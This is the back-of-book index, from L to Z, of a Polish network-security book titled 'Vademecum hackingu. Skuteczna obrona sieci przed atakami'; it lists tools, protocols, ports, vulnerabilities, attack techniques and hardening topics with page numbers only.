Protocol, 564

liczba prób logowania, 208

LIDS, Linux Intrusion Detection System, 368

linia do transferu danych, 445

linie POTS, 533

lista

ACL, 36, 72, 296

ACL chronionych zasobów, 270

portów, 194, 782

wpisów DNS, 68

zalogowanych użytkowników, 167

LKM, Loadable Kernel Module, 365

LM, LAN Manager, 212

logowanie

anonimowe, 151

do sieci głosowych, 473

lokalne przepełnienie bufora, 340

losowy modyfikator, 235

LUA, Least User Access, 271

luka

ASP::$DATA, 611

bufora drukarki, 224

CVE-2010-1807, 699

CVE-2012-0072, 654

Print Spooler Service Impersonation, 224

rpc.ttdbserverd, 319

Translate: f, 613

w aplikacji Skype, 713

w jądrze Linuksa, 347

w kodzie RPC XDR, 307

w przeglądarce Internet Explorer, 381

w wymianie komunikatów, 331

luki

bezpieczeństwa, 789

systemu, 120

w aplikacjach, 751

w bazach danych, 653

w oprogramowaniu klienckim, 202

w serwerach WWW, 608, 610

w sterownikach, 227

w systemach Windows, 201, 222

w systemie X, 326

w technologii SQL, 280

w usługach SSH, 331

we Flashu, 226



ładowalne moduły jądra, 365

łamanie

haseł, 231, 241, 336, 662

atak siowy, 236

atak sownikowy, 236

kluczy WEP, 432, 554

kluczy WPA-PSK, 562

numerów PIN, 718

podsłuchanych żądań, 238

skrótów LM, 238

skrótów NTLM, 238

usług systemu Windows, 273

za pomocą tablic tęczowych, 238

M

MaaS, Malware as a Service, 423

magistrale, 590

makro, 494

manifest, 695

 

Skorowidz 809

maper punktów końcowych, 142

mapowanie

luk, 285

sieci, 90

maszyna wirtualna Dalvik, 677

maszyny typu mainframe, 39

MCF, Modular Crypt Format, 338

mechanizm

ASLR, 278

BDE, 268, 269

GS, 278

SafeSEH, 278

SEH, 273

menedżer

certyfikatów, 264

zadań, 500

metadane, 51

metoda Response.Redirect, 647

metody

protokołu SIP, 510

szyfrowania, 541

MFT, Master File Table, 394

MIB, Management Information Base, 169

MIC, Mandatory Integrity Control, 271, 760

Microsoft Office, 494

MIKEY, Multimedia Internet Keying, 532

mikrokontroler, 589, 598

moduł SE, 718

modyfikowanie aplikacji, 695–698

monitorowanie sieci, 84

montowanie firmware’u, 595

MTA, Mail Transfer Agent, 317

N

narzędzia

diagnostyczne, 72

dla Androida, 679

do atakowania aplikacji sieciowych, 627

do czyszczenia dzienników, 360

do łamania haseł, 237

do monitorowania integralności systemu

plików, 765

do odkrywania sieci, 83, 547

do programowania mikrokontrolerów, 598

do rootowania Androida, 682

do wardialingu, 443

do wykrywania pingowania, 91

do zarządzania strumieniami plików, 256

frameworku WebScarab, 626

hakerskie, 438

pakietu Security Toolkit, 632

przekaźnikowe, 31

systemu operacyjnego, 83

używane po włamaniu, 258

z programu Cain, 244

narzędzie, Patrz program

NAT, NetBIOS Auditing Tool, 152

NAT, Network Address Translation, 52

nawiązywanie sesji, 539

nazwy plików, 258

NBNS, NetBIOS Name Service, 145

NFS, Network File System, 105, 318, 320

NIC, Network Interface Card, 357

NIDS, Network Intrusion Detection System, 74

niebezpieczne

testy, 121

usługi, 296

niestandardowe

aplikacje, 193

eksploity, 221

nieszyfrowane sieci, 550

NIS, Network Information System, 185

nisko wiszące owoce, 460

Nmap dla Androida, 722

nośnik rozruchowy, 370

NSE, Nmap Scripting Engine, 121

NT, new technology, 117

numer

AS, 61

ASN, 175

BGP, 61

IMEI, 714

PIN, 718

O

obliczanie sumy CRC, 380

obsługa

skryptów HTR, 615

sygnałów, 344

szyfrowania, 553

ochrona anonimowości, 28

odbiornik

Oracle TNS, 187, 188

rozgłoszeniowy, 696

odgadywanie haseł, 203, 206, 212

 

810 Vademecum hackingu. Skuteczna obrona sieci przed atakami

odkrywanie

aktywne sieci, 546

hostów

ARP, 79

ICMP, 81

TCP, 86

UDP, 86

pasywne sieci, 547, 550

sieci, 83

odmawianie uprawnień, 231

odmowa usługi, 532, 552, 616

odwrotne połączenie telnetowe, 312

odzyskiwanie haseł, 240

ograniczanie

dostępu do usług, 207

przesyłania informacji o strefie, 134

uprawnień administratora, 767

opcja

RestrictAnonymous, 163, 166, 266

Zapisz jako, 505

opcje

ike-scan

opcja –A, 192

opcja --aggressive, 192

internetowe, 263

ls

opcja –a, 414

opcja –b, 414

opcja –l, 414

nc

opcja –l, 312

opcja -v, 312

netcat

opcja –d, 248

opcja –l, 248

opcja –L, 248

opcja –p, 248

opcja –u, 101

opcja –v, 101

opcja –vv, 101

opcja –w2, 101

opcja –z, 101

netstat

opcja –a, 395

opcja –an, 261

opcja –n, 395

opcja –o, 261, 395

Nmap, 30

opcja –b, 97

opcja –D, 96

opcja –f, 96

opcja –n, 30

opcja –o, 96

opcja –oG, 96

opcja –oN, 96

opcja –oX, 96

opcja –p, 30

opcja –PM, 85

opcja –Pn, 88

opcja –PN, 30

opcja –PP, 85

opcja –PR, 80

opcja –sC, 121

opcja –sn, 83

opcja –sR, 183, 318

opcja –sT, 30

opcja –sV, 30, 117

sc

opcja privs, 275

opcja qprivs, 275

ScanLine, 100

TCP, 107

TSGrinder, 209

OpenSSL, 333

operacja Aurora, 379

organizacja

ARIN, 68

ASO, 56

Carrier IQ, 714

CCNSO, 56

CERT, 310

GNSO, 56

IANA, 55

ICANN, 55

IEEE, 537

ITU, 510

otwarte

porty, 104

usługi, 29

OUI, Organizationally Unique Identifier, 80

P

pakiet

BIND, 328

ECHO_REPLY, 91

FIN, 106

HOST_UNREACHABLE, 91

IRPAS, 177

TIME_EXCEEDED, 91

 

Skorowidz 811

pakiet narzędzi

aircrack-ng, 548, 557

Burp Suite, 628

BusyBox, 693

Cain and Abel, 158

dsniff, 524

EMET, 226, 267

GRSecurity, 297

HP Security Toolkit, 632

net-snmp, 170

nfsshell, 322

Oracle Assessment Kit, 189

Oracle Auditing Tools, 190

Reskit, 146

Resource Kit, 210, 250

SDK, 679

SDK Androida, 681

Service Pack 3, 163

SFU, 182

SIPVicious, 517

Sysinternals, 388, 399

unrar, 341

wget, 621

pakiety

ARP, 555

GARP, 529

ICMP, 73

NBNS, 146

UDP, 73

wbudowane baz Oracle, 659

z fałszywą opcją, 106

PAM, Pluggable Authentication Module, 332

pamięć

EEPROM, 588, 597

podręczna funkcji LSA, 242

podręczna serwera DNS, 132, 135

podręczna żądań DNS, 400

panel Poison Ivy, 422

partycja U3, 581

pasmo ISM

2,4 GHz, 537

5 GHz, 537

pasywna identyfikacja systemu, 110

pasywny fingerprinting, 111

PCM, Pulse Code Modulation, 526

PGP, Pretty Good Privacy, 64

phishing ukierunkowany, 376, 421

PIE, Position Independent Executable, 728

ping sweep, 84, 90, 114, 146

pingowanie, 79

z wykorzystaniem protokołu ARP, 83

z wykorzystaniem protokołu TCP, 84

platforma

AMP, 630

MaaS, 423

NT, 117

UMDF, 229

plik

.bash_history, 362, 425

.plan, 138

.rhosts, 315

1.txt, 407

6to4ex.dll, 393, 396, 400

Ad.bat, 407

autorun.ini, 581

Classes.dex, 695

cleanup, 402

cmd.exe, 503

core, 345

CTL, 522

dziennika, 568

explorer.exe, 503

freeze.tar.xz, 743

global.asa, 613

hosts, 396

in.ftpd, 325

index.dat, 404

inetd.conf, 138

keychain, 752

KEYLOG.itchy, 326

LMHOSTS, 146

login, 346

mail.cf, 130

MFT, 394

nmap-service-probe, 118

nmap-services, 117

ntuser.dat, 404

nudge.txt, 124

osprints.conf, 110

passwd, 136, 323, 336, 418

pps, 416

robots.txt, 140

SAM, 232

shadow, 136, 335, 345

Shadow.bak, 410

sshd_config, 328

strings.list, 364

stronicowania, 390

svchost.exe, 427

 

812 Vademecum hackingu. Skuteczna obrona sieci przed atakami

plik

test-cgi.php, 411, 419

users.txt, 290

wce_krbtkts, 221

WINVNC.INI, 250

pliki

.apk, 695

.asp, 613

.asx, 464

.bas, 464

.bat, 407

.bmc, 404, 428

.gif, 427

.lnk, 425

.pcf, 484, 485

.pf, 427

.rar, 341

.rdp, 404, 425, 428

.url, 507

.vbs, 507

.was, 464

.wsf, 507

dex, 677

dziennika, 363

dziennika programu antywirusowego, 404

ELF, 681

IPSW, 731

konfiguracyjne, 514

konfiguracyjne systemu, 353

ukryte w strumieniu, 257

z bitem SUID, 349

PMIE, Protected Mode Internet Explorer, 271

pobieranie

haseł z pamięci, 242, 245

skrótów haseł, 247

podręcznik man, 68

podsłuchiwanie

danych, 550

danych przesyłanych magistralą, 590

interfejsu bezprzewodowego, 592

protokołu Kerberos, 215

uwierzytelniania, 213, 233

wymiany haseł, 212

podsystem uwierzytelniania, 246

podział odpowiedzi HTTP, 645, 648

pola formatu MCF, 339

pole

ACK, 106

PT, 526

TTL, 72, 524

polecenie

ABOR, 344

at, 261, 402

auditpol, 255

db_import, 113

db_nmap, 112

dig, 68, 131

dlldump, 393

EXPN, 129

find, 349, 416

FOR, 204

gem env, 447

go.cmd, 582

grep, 364

HEAD, 139

host, 29, 68

hosts, 113

id, 701

kill, 367

killall, 138

last, 418

ls, 414

man mount, 322

nbtscan, 147

nbtstat, 147

net use, 204

net view, 146, 151

netstat, 261

nslookup, 65

openssl, 139

PASV, 345

rusers, 184

schtasks, 261

secedit, 267

SECURITY SET PASSWORD, 580

services, 114

showmount, 190, 322

snmputil, 169

strings, 401, 416

sudo, 79, 411

tail, 327

tor-resolve, 29

touch, 363

VRFY, 129, 293

xhost, 325

xlswins, 327

połączenia

wdzwaniane, 470, 472

z systemem Meridian, 474

 

Skorowidz 813

połączenie

telnetowe, 123, 311, 313

typu C&C, 381

z modemem, 460

z serwerem FTP, 125

pomoc

aplikacji, 492

systemu, 492

ponowny rozruch, 706

poprawki jądra, 296

port

111, 182

1337, 354

135, 104, 142, 203

137, 145, 149

139, 103, 163

1417, 118

1433, 203

1434, 186, 203

1521, 187

161, 169

179, 174

2049, 189

21, 125

22, 105

222, 699

23, 126

2483, 187

25, 129

3268, 178

32771, 182, 184

3389, 104, 249

389, 177

443, 203

445, 103, 163

500, 191, 486

5060, 510

513, 184

53, 73, 130

69, 136

79, 137

80, 86, 138

8118, 29

9050, 29, 31

porty

o wysokich numerach, 105

oczekujące na pakiety, 92

standardowe, 782

poufne dane uwierzytelniające, 342

poziomy integralności, 271

problem liczb zmiennoprzecinkowych, 700

proces, 260, 394

svchost, 275, 399

TrustedInstaller, 270

procesy oczekujące na pakiety, 395

program

ACE, 523

Active Directory Administration Tool, 177

AIDE, 355

aircrack-ng, 555, 558

aireplay-ng, 552, 557

airodump-ng, 433, 549

Amap, 118

Android Debug Bridge, 679

apktool, 696

AppSentry Listener Security Check, 188

arp-scan, 79

arpspoof, 524

asleap, 565

ASS, 177

Athena 2.0, 50

Attacker, 103

auditpol, 255

awstats, 310

axfr, 68

BMC Viewer, 406

Bro-IDS, 74

Burp Proxy, 628

Burp Repeater, 627

Burp Spider, 628

CacheDump, 244

Cain, 81, 213, 238, 243

Cain & Abel, 74

chntpw, 268

Cin, 238

Citrix Access Gateway, 490

cmd, 258

Connect Cat, 722

ConnectBot, 690

Courtney, 91

cp, 257

CurrPorts, 396

DDMS, 679

dig, 68

DirBuster, 38

dnsenum, 133

dnsrecon, 68

dosemu, 350

 

814 Vademecum hackingu. Skuteczna obrona sieci przed atakami

program

dsniff, 357

Dumpel, 210

DumpEvt, 211

DumpSec, 151, 156

ELM Log Manager, 211

enum, 161

enum4linux, 161

epdump, 142

ES File Manager, 690

Event Comb, 211

FDPro, 389

fgdump, 233

Fiddler, 626

fierce 2.0, 68

finger, 137, 182, 193

fipe, 254

Firewalk, 74

FOCA, 51

fpipe, 252

FTK Imager, 389

FTK Manager, 390

GetAcct, 166

getmac, 162

getsids, 188

Gh0st, 384

GingerBreak, 684

Grendel-Scan, 141

gsecdump, 243

Handy Light, 746

host, 68

Hping3, 85

IDA Pro, 594

IKECrack, 489

IKEProber, 487

ike-scan, 191, 487, Patrz także opcje

in.telnetd, 346

InstaStock, 747

inviteflood, 532

Ipfilter Firewall, 296

ippl, 91

iptables, 296

ISOCreate.cmd, 583

JailbreakMe, 738

John the Ripper, 237, 337

Juice Defender, 691

JXplorera, 180

Kismet, 547

logclean-ng, 362

L0phtcrack, 238

ldp, 178

LCP, 213, 237–239

Legion, 152

LIDS, 368

Lockdown, 142

logcat, 715

logclean-ng, 360

LOIC, 383

ls, 414, Patrz także opcje

LSADump, 244

LSADump2, 245

lsof, 413

LUMA, 180

macchanger, 528

Maltego, 44, 53

Market Enabler, 690

Medusa, 289

Metasploit, 112, 222

Microsoft Security Essentials, 267

msconfig, 259

MSRPC, 143

MSRT, 422

NAT, 152, 154

NBTEnum, 158, 164

nbtscan, 147

nc, 32, 101, 312, Patrz także opcje

NeoTrace Professional, 74

Nessus, 31, 119, 618

netcat, 101, 123, 248, Patrz także opcje

Netdom, 146

NetE, 162

netstat, 395, 412, Patrz także opcje

Network Scanner, 152

Network Spoofer, 721

Nikto, 31, 617

Nmap, 28, 83, 121, 694, Patrz także opcje

NMBscan, 148

Nping, 85, 89

onesixtyone, 172

OpenVAS, 119

OpenWall, 297

Ophcrack, 238

PhishTank, 387

PhoneSweep, 441–456

ping, 83

pingd, 92

pkexec, 343

Poison Ivy, 420, 422

 

Skorowidz 815

privoxy, 29, 39

Process Explorer, 260, 396

Process Monitor, 396

Protolog, 91

proxychains, 30

pscan, 185

PsExec, 230, 249

psk-crack, 192

pulist, 260

pwdump, 233, 234

RAT, 381

Rational AppScan, 635

Rdesktop, 206

regdmp, 154

regedit, 259

regedt32, 163, 259

Responder Pro, 389

ROM Manager, 690

rpcinfo, 182

rusers, 184

rwho, 184

Sam Spade, 68

sc, 275, Patrz także opcje

ScanLine, 99

scanlogd, 91

scapy, 527

Screenshot, 690

Security Toolkit, 630

sendmail, 317

Server Network Utility, 186

SET, 503

SetCPU, 690

ShareEnum, 152

Shark for Root, 720

showmount, 183, 190

services, 280

sid2user, 156

SignApk.jar, 698

SIPcrack, 531

SIPdump, 531

siphon, 110

sipsak, 519

SIPScan, 520

SiteDigger, 50

SiteDigger 2.0, 50

SiVuS, 512

SMBRelay, 216

sniffdet, 359

snmpget, 170

Snort, 74, 90, 102

SNScan, 171

socat, 31

SQL Power Injector, 641

SQLPing, 186

Squirtle, 216

srvcheck, 151

srvinfo, 151

strings, 595

SucKIT, 366

sudo, 411

SuperOneClick, 682

SuperScan, 86–89, 97

Superuser, 690

svwar.py, 517

taskkill, 260

tcpdump, 527

Tcpdump, 694

tcptraceroute, 74

TDSS, 423

Teleport Pro, 38

TeleSweep, 441, 444, 451

THC Hydra, 289

THC-Scan, 441, 453

THC-SSL-DOS, 333

The Volatility Framework Tool, 391

ToneLoc, 441, 453

traceroute, 71, 74

tracert, 71

Tripwire, 355, 765

Trout, 74

TSGrinder, 205

Ubertooth, 585

UCSniff, 529

ulimit, 345

Universal_Customizer, 583

URLScan, 142

user2sid, 156

UserDump, 166

UserInfo, 164

Venkman JavaScript Debugger, 625

Vidalia, 29

Vmmap, 396

VMMap, 399

VNC, 250

Voicemail Box Hacker, 476

VoIP Hopper, 528

Volatility, 394

vomit, 527

 

816 Vademecum hackingu. Skuteczna obrona sieci przed atakami

program

VrACK, 476

WarVOX, 443–450

waveplay, 527

WayBack Machine, 48

WCE, 219, 246

WebInspect, 630

wget, 38, 694

Wikto 2.0, 50

Winfingerprint, 158

WINVNC, 259

Wireshark, 551, 566

xhost, 327

xscreensaver, 342

xterm, 324, 328

Z4Root, 683

programator pamięci EEPROM, 597

programowanie

mikrokontrolerów, 598

ROP, 298

programy

do hakowania, 260

do łamania haseł, 662

statyczne, 369

typu antimalware, 258

projekt

FreeSWAN, 360

MULTICS, 284

OWASP, 610, 636

PaX, 297

RainbowCrack, 237

The Sandman Project, 390

projektowanie zabezpieczeń, 757, 763, 776

protokoły

szyfrowania, 192

trasowania, 174, 177

uwierzytelniania, 220, 568

protokół

ARP, 79, 522

BGP, 174

Bluetooth, 585

DNS, 130

EAP, 564

EAP-GTC, 569

EAP-TTLS, 567

FTP, 125

H.323, 510

HTTP, 138

HTTPS, 144, 203

ICMP, 81, 86, 92

IEEE 802.11, 432

IKE, 191, 483, 487

IPP, 612

IPSec, 215, 360

IPv4, 78

IPv6, 78

Kerberos, 213

LDAP, 177

LEAP, 564

LLDP-MED, 522

LM, 212, 214

MSCHAPv2, 569

NetBIOS, 148

NTLM, 213, 219

PAP, 568

PEAP, 567

PKINIT, 215

RDP, 49, 104

RPC, 182

RTP, 511

Secure FTP, 126

Secure RPC, 319

SIP, 510

SMB, 150, 163, 203, 216, 280

SMTP, 129

SNMP, 169, 173

SSH, 127, 359

SSL, 139

TCP, 71, 86

telnet, 127

TFTP, 136

TKIP, 540

TLS, 532

UDP, 86

WEP, 433

próbnik logiczny, 591

przechowywanie haseł, 244

przechwytywanie

banerów, banner grabbing, 104, 116, 124

danych, 524, 531

pakietów 802.11, 555

wymiany komunikatów, 560, 565

przeglądarka

Internet Explorer, 496–498

IP Network Browser, 172

MobileSafari, 738

przejęcie domeny, domain hijacking, 64

przejmowanie konta administratora, 284

 

Skorowidz 817

przekierowanie ICMP, 524

przekierowywanie

adresów DNS, 216

odpowiedzi skryptów, 646

portów, 252

przekształcanie na postać kanoniczną, 611

przepełnienie

bufora, 278, 293, 341, 615, 659

typu całkowitoliczbowego, 304, 308

przesyłanie informacji o strefie, zone transfer, 65

przeszukiwanie sieci WWW, 621

PSK, Pre-Shared Key, 559

PSTN, Public Switched Telephone Network, 438,

510

PT, Payload Type, 526

PTK, Pairwise Transient Key, 540

punkt dostępu, 433, 538

filtrowanie adresów MAC, 539

ignorowanie Probe Request, 539

ukrywanie identyfikatora SSID, 539

punkty

ASEP, 259, 766

ataku, 769

transferu, 427

R

ramki

administracyjne, 546

nawigacyjne, beacon, 539

RAS, Remote Access Service, 147

RAT, Remote Administration Tool, 381

RBN, Russian Business Network, 383

RDP, Remote Desktop Protocol, 49, 104

refaktoryzacja usług, 275

rejestratory danych w Androidzie, 713

rejestrowanie

ataków, 90

domen, 64

zawartości pamięci, 389

rekonesans sieci, 74

rekord

HINFO, 67, 71

version.bind, 132, 134

RID, relative identifier, 157

robak

iKee, 739–742

Nimda, 612

sadmind, 318

SQL Slammer, 652

robaki internetowe, 200

rodzaje skanowania, 93

rootkit, 257, 353, 368

enyelkm, 367

SucKIT, 366

rootowanie, 681

rootowanie urządzenia Kindle Fire, 684

rozmiar okna TCP, 106

rozszerzenia serwerów, 612

rozszerzenie

MIC, 271, 277

Torbutton Firefoksa, 29

WebDAV, 614

RPC, Remote Procedure Call, 142, 182, 318

RPM, Red Hat Package Manager, 356

RTP, Real-time Transport Protocol, 511

rutery cebulowe, 28

S

SAM, Security Accounts Manager, 232

schemat pinów, 589

SCM, Service Control Manager, 275

SEH, Structured Exception Handling, 273

serwer

BIND, 132

C&C, 409

DHCP, 435, 522

DNS, 62, 130, 329

Exchange, 144

FreeRADIUS-WPE, 567

FTP, 97, 126

IIS, 140, 610

IPSec, 191

LDAP, 131

NetBus, 261

PostgresSQL, 112

RADIUS, 564

Samba, 191

sendmail, 293

SMTP, 129

SQL Server, 186

TFTP, 136, 513, 522

Tomcat, 410

TTDB, 183

VPN, 191

WHOIS, 58

 

818 Vademecum hackingu. Skuteczna obrona sieci przed atakami

serwer

WINS, 218

WWW, 615

WWW Apache, 29

X, 326

pośredniczący, 28

Burp Suite, 627

Fiddler, 625

socat, 31

SOCKS, 28, 31

sslproxy, 139

serwis

AWMProxy, 424

CIS, 280

Foundstone, 50

Google Earth, 41

iKat, 504

Mapy Google, 41

XDA Developer, 688

Yahoo! Finance, 46

sesja

usług, 277

użytkownika, 277

zerowa, null session, 150, 163

SET, Social Engineering Toolkit, 503

sfałszowane pakiety, 434

SFP, System File Protection, 142

SFU, Windows Services for UNIX, 182

SGID, Set Group ID, 349

sieci bezprzewodowe, 435, 536

ad-hoc, 538

ataki DoS, 552

podsłuchiwanie danych, 550

stacjonarne, 538

szyfrowanie, 541

uwierzytelnianie, 540

sieć

anonimowa, 28

Bluetooth, 536

botnet, 423

DMZ, 91

PSTN, 510

retailnet, 434

Tor, 28

Voice VLAN, 527

VPN, 39, 144, 191, 482

typu brama-brama, 483

typu klient-brama, 483

uwierzytelnianie, 483

SIP, Session Initiation Protocol, 510

skaner, 28, 95, 416

ASS, 177

Nessus, 618

NetBIOS, 152

netcat, 101

Nikto, 617

Nmap, 95

ScanLine, 99

SuperScan, 97

Virustotal, 394

WebInspect, 630

skanery

luk, 119, 121

luk serwerów WWW, 617

udziałów, 153

zabezpieczeń aplikacji sieciowych, 629

skanowanie, 77

ARP, 79

FTP bounce, 97

luk, 119

okien TCP, 94

portów, 29, 84, 88, 92, 102

portów TCP i UDP, 89, 105

SNMP, 171

systemów SIP, 511, 513

TCP ACK, 94

TCP connect(), 93

TCP FIN, 94

TCP Null, 94

TCP RPC, 94

TCP SYN, 93

TCP Xmas Tree, 94

UDP, 94

UDP oparte na danych, 98

usług, 134

wersji, 117, 118

sklep

Android Market, 710

App Store, 748

skrót hasła, 218, 232

skrypt, 68, 464

in.ftpd, 324

NSE, 121

Perla, 134

rpcdump.py, 143

S99local, 352

skrypty do wykrywania baz danych, 652

SMB, Server Message Block, 150, 191, 203

 

Skorowidz 819

SMTP, Simple Mail Transfer Protocol, 129

sniffer, 356

SNMP, Simple Network Management Protocol,

169

sprawdzanie

listy procesów, 260

luk, 32

numerów ISN, 106

poprawności danych, 302

portów, 31

sum kontrolnych, 355

spreparowana strona logowania, 743

SRTP, Secure RTP, 532

SSH, Secure Shell, 289, 359

SSI, Server Side Includes, 651

SSP, Stack Smashing Protector, 295

stan LISTENING, 92

standard

H.323, 532

IEEE 802.11, 536

WPA, 538

sterownik, 228

Android Composite ADB Interface, 686

chipsetu, 542

sterowniki urządzeń, 202

strefa ograniczonego zaufania, 311

strumienie ADS, 257

strumień danych RTP, 527

style CSS, 40

SUID, Set User ID, 349

SVN, Subversion, 289

sygnał

SIGPIPE, 344

SIGURG, 344

sygnatury TSIG, 71

system

DISA, 481

DNS, 64, 328

EFS, 267

HIPS, 765

IDS, 45, 84

IPS, 74

Meridian, 474

NFS, 189

NIDS, 74

NTFS, 256

okienkowy X, 326

PBX, 473, 475

PhoneMail, 475

SFP, 142

U3, 581

WHOIS, 58

XDR, 318

system operacyjny

Android, 673

BackTrack, 445, 544

FreeBSD, 307

iOS, 725

IRIX, 307

Kindle Fire OS, 684

Linux, 296, 307

Mac OS X, 297, 727

NeXTSTEP, 726

OpenBSD, 297

Solaris, 302, 768

Ubuntu, 367

UNIX, 284

Windows, 200

systemy wykrywania włamań, 36

sytuacja wyścigu, 343

szkodliwe

aplikacje

Handy Light, 745

InstaStock, 747

TDSS, 423

ze sklepu App Store, 748

biblioteki DLL, 260

procesy, 260

szkodliwy

e-mail, 387

serwer WWW, 216

szperacz sieciowy Shark for Root, 720

szperacze, 356–358

szyfrowanie, 359

AES-CCMP, 541

sygnału, 532

TKIP, 541

warstwowe, 28

WEP, 538, 541



ścieżka AS, 175

śledzenie punktów dostępu, 545

środowisko

Citriksa, 492–495, 500, 508

Eclipse, 600

MPLAB IDE, 599

 

820 Vademecum hackingu. Skuteczna obrona sieci przed atakami

T

tablica

IDT, 367

nazw NetBIOS, 147

RainbowCrack, 237

tablice

crackujące, 236

mieszające, 235

tęczowe, rainbow tables, 213, 236, 561

technika

getadmin, 229

lock bumping, 572

pass-the-hash, 219

ping sweep, 90

return-to-libc, 298

techniki

ataków DoS, 794

zabezpieczania oprogramowania, 776

technologia ASLR, 297, 678

technologie bezprzewodowe, 569

telefon IP, 522

telnet, 128

terminal xterm, 325

TFTP, Trivial File Transfer Protocol, 136

TGT, Ticket Granting Ticket, 220

TKIP, Temporal Key Integrity Protocol, 540

TLS, Transport Layer Security, 532

tłumienie komunikatów o błędach, 106

TNS, Transparent Network Substrate, 187

token procesu, 275

topologia sieci, 71

Tor, The Onion Router, 28

TPM, Trusted Platform Module, 269

translacja NAT, 411

trasowanie

cebulowe, 28

pakietów, 287

trojany, 354, 695

trojany z furtką, 426

tryb

diagnostyczny, 596

odbiorczy, promiscuous mode, 357

PMIE, 271

selektywnego rozruchu, 259

skanowania sieci, 192

TSIG, Transaction Signature, 71

TTDB, ToolTalk Database, 183

TTL, Time-To-Live, 72

tunel

IPSec, 484

TLS, 567

tunelowanie pakietów, 482

tworzenie

dynamicznych aplikacji sieciowych, 622

eksploitów, 223

hiperłączy, 502

kanału powrotnego, 314

kopii witryn, 38

kopii zapasowych, 772

migawki, 389

odbiornika netcata, 315

pakietów, 85

poprawek, 223

silnych haseł, 241, 290, 340

skrótów, 235, 506

skryptów VBS, 507

skryptów Windows Script File, 507

tablic tęczowych, 565

tunelu, 483

węzłów, 259

zabezpieczeń, 765

typy zdalnych ataków, 315

U

UCSniff

interfejs graficzny, 530

tryb MiTM, 529

tryb Monitor, 529

ujawnienie kodu źródłowego, 611

układy

FPGA, 588

scalone, 587

ukryte znaczniki, 649, 650

ukrywanie

plików, 255, 414

serwera, 187

tożsamości, 64

umowa EULA, 505

uprawnienia, 230, 708

uprawnienia do plików i katalogów, 348

URI, Uniform Resource Identifier, 708

uruchamianie

powłoki poleceń, 493

szkodliwych procesów, 261

 

Skorowidz 821

urządzenia

Cisco, 127, 523

przenośne, 572, 672

sieciowe, 136

urządzenie

antena, 544

bezprzewodowa karta sieciowa, 542

dysk ATA, 579

iPhone, 726

Kindle Fire, 684

odbiornik GPS, 545

pendrive, 581

punkt dostępu, 545

telefon komórkowy, 585

Ubertooth One, 585

usługa

Active Directory, 130, 158, 177–181, 233

Alerter, 149

DISA, 480

DNS, 130

finger, 137, 193

FTP, 125, 316

Global Catalog, 131

Google Locations, 41

NBNS, 145, 149, 218

NFS, 105, 182

NIS, 182, 185

NIS+, 185

OpenSSH, 118

Outlook Web Access, 39, 144

portmapper, 182

Posłaniec, 149

RAS, 147

Remote Desktop Web Connection, 49

RPC, 105

rpcbind, 182, 193

rusersd, 182

SAM, 232

Scheduler, 260

SMTP, 130

SNMP, 173

SQL Resolution Service, 186

SSH, 331

telnet, 127

Tomcat, 410

VNC, 250

WebConnect, 39

Windows Scheduler, 230

WINVNC, 250, 252

WMI, 158

WSUS, 263

usługi

domeny, 130

IAX VoIP, 448

sieciowe, 104, 125, 202, 222

SMB, 203

TS, 209, 250

z minimalnymi uprawnieniami, 275

ustalanie wersji Apache’a, 31

ustawianie

alarmów, 212

dostępu anonimowego, 168

inspekcji, 211

serwera RADIUS, 567

zasad grupy, 265

usuwanie

fizycznych zabezpieczeń, 586

strumieni plików, 257

uszkodzenie urządzenia, 681

uwierzytelnianie, 760

AAA, 127

BSD_AUTH, 332

dwuskładnikowe, 468

jednoskładnikowe, 466

Kerberos, 131

NTLM, 217

SKEY, 332

TACACS+, 127

V

VFS, Virtual File System, 368

VNC, Virtual Network Computing, 250

VoIP, Voice over IP, 438, 443

VPN, Virtual Private Network, 39, 287

W

wardialer, 448

wardialing, 441, 444, 456, 515

warstwy zabezpieczeń, 762

wartość TTL, 110

wątki procesów, 260

WCE, Windows Credentials Editor, 219, 246

wektor IV, 554

WEP, Wired Equivalent Privacy, 433, 554

wersja serwera WWW, 32, 138

wewnętrzne protokoły trasowania, 177

 

822 Vademecum hackingu. Skuteczna obrona sieci przed atakami

węzeł

AppDataLow, 272

CachedLogonsCount, 245

Dont Show UI, 206

Konfiguracja użytkownika, 267

NETSVCS, 425

NL$n, 244

Opcje zabezpieczeń, 266

Przypisywanie praw użytkownika, 231

Run, 259

SAM, 232

Secrets, 242

Services, 426

Software, 259

Ustawienia zabezpieczeń, 266

Zasady inspekcji, 210

WFP, Windows File Protection, 269

widmo radiowe, 537

wiersz polecenia, 493

Wi-Fi, Wireless Fidelity, 536

Windows NT4, 229

WINS, Windows Internet Naming Service, 218

wiszący wskaźnik, 308, 310

witryna Verisign, 58

włamania do środowiska Citriksa, 508

włączanie inspekcji, 210

WMI, Windows Management Instrumentation,

205

WPA Enterprise, 540, 564

WPA, Wi-Fi Protected Access, 540

WPA-PSK, 540, 559

wpis

w dzienniku, 196

w rejestrze, 258

wstawianie znaczników HTML, 637

wstrzykiwanie

bibliotek DLL, 230

kodu w SQL-u, 604, 640

WSUS, Windows Server Update Services, 263

wtyczka TamperData, 624

wtyczki przeglądarek, 623

wyciekanie danych, 441, 765

wykorzystanie niezabezpieczonych możliwości,

709

wykradanie danych, 703, 705

wykrywanie

aktywnych hostów, 95

ataków APT, 428

baz danych, 652

pasywne, 109

pingowania, 91

skanowania portów, 103, 108

systemu operacyjnego, 103, 108

szkodliwych plików, 258

wyliczanie, enumeration, 115

banera usługi, 123

domen, 145

egzemplarzy serwerów SQL, 186

grup roboczych, 145

informacji o systemie, 127

kont, 128, 158

kontrolerów domeny, 146

tras BGP, 175, 177

udziałów plikowych, 151

użytkowników, 156, 520

wpisów DNS, 68

zaufanych domen, 155

wyłączanie

inspekcji, 254

usług

NBNS, 218

NetBIOS, 208

SMB, 208

zbędnych usług, 103, 280, 296, 769

wymuszanie silnych haseł, 208

wyszukiwanie

lokalizacji na podstawie adresu MAC, 41

szkodliwych wpisów, 258

wyszukiwarka SHODAN, 52

wyszukiwarki, 48

wyświetlanie tablicy nazw NetBIOS, 147

wywołania RPC, 318

X

XDR, External Data Representation, 318

XSS, Cross-Site Scripting, 636

Z

zabezpieczanie

aplikacji sieciowych, 774

aplikacji użytkowych, 226

baz danych, 774

bibliotek współużytkowanych, 346

komputerów stacjonarnych, 765

OpenSSL-a, 333

oprogramowania, 776

 

Skorowidz 823

plików z bitem SUID, 351

pliku core, 345

połączeń wdzwanianych, 470

portów, 261

protokołu EAP-TTLS, 569

protokołu LEAP, 566

protokołu PEAP, 569

rozwiązań mobilnych, 775

sendmaila, 317

serwera Apache, 334

serwera TFTP, 514

serwerów, 766

sieci, 772

sieci WEP, 558

sieci WPA-PSK, 563

